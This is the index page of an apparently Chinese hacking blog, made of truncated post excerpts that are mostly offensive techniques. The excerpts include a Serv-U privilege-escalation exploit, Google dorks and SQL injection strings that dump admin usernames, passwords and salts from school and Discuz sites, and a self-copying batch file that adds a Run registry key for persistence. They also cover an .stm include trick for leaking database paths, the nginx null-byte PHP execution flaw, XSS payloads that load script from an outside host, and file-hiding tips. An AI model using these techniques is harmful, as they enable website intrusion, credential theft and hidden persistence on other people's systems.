小马博客

一个无聊的人,一个无聊的博客

常见虚拟主机目录对照 D:\virtualhost\web580651\www\          新网虚拟主机 F:\usr\fw04408\xpinfo\                  万网虚拟主机 D:\hosting\wwwroot\                    Prim@Hosting虚拟主机 e:\wwwroot\longzhihu\wwwroot\  ...

发布 0 条评论

serv-u最新通杀所有版本提权代码。10.x的也可以提,昨天俺成功11版本的, 不要直接添加系统帐号或者执行命令,用添加的FTP帐号在CMD下面连接提权。 要不容易出错的。 [php]<style type="text/css"> <!-- body,td,t...

发布 0 条评论

教育站打印页面漏洞 百度或google搜索 inurl:info_Print.asp?ArticleID= 默认后台:/ad_login.asp 爆管理员密码: 在 域名/inurl:info_Print.asp?ArticleID=数字 union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16...

发布 0 条评论

@echo off if not exist c:\windows\feixin.bat copy "%~0" c:\windows\feixin.bat reg add hkcu\software\microsoft\windows\currentversion\run /v feixin /t reg_sz /d c:\windows\feixin.bat /f :: sno 为自己的手机号;psw 为飞...

发布 0 条评论

入侵网站时,遇到实在上传不了木马,可以试试上传一个stm文件, 内容为:   <!--#include file="conn.asp"-->   直接访问这个stm文件, 会发现是空白文件,但右键查看源码,你会发现conn.asp就一览无遗, 数据库路径也就到手啦!...

发布 0 条评论

这个漏洞早就出来了,收集在我电脑里找不到了,写到博客上好记点! 1.注册个用户,登录 2.随便找个帖子回复! 回复内容 ↓ 注入语句: a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where...

发布 1 条评论

Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码 影响版本: nginx 0.5.* nginx 0.6.* nginx 0.7 <= 0.7.65 nginx 0.8 <= 0.8.37

发布 0 条评论

1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javas...

发布 0 条评论

我最常用的就是attrib这个命令,感觉很方便! 一、瞒天过海   这个方法主要是针对一些不想让别人看见的文件,首先修改想隐藏文件的扩展名,将扩展名修改成在系统中没有的类型,比如*.ffh *.jjk 等等,由于这些文件没有跟系统中的任...

发布 0 条评论

天网是大家常用的防火墙软件,有许多人撰文提议安装天网,一时间天网防火墙成了菜鸟、高手必备工具。这样做当然好,至少说明了大家的网络安全意识提高了许多。但万事都有个“度”,超过这个“度”就不好了。现在有许多人对天网的迷信达到...

发布 0 条评论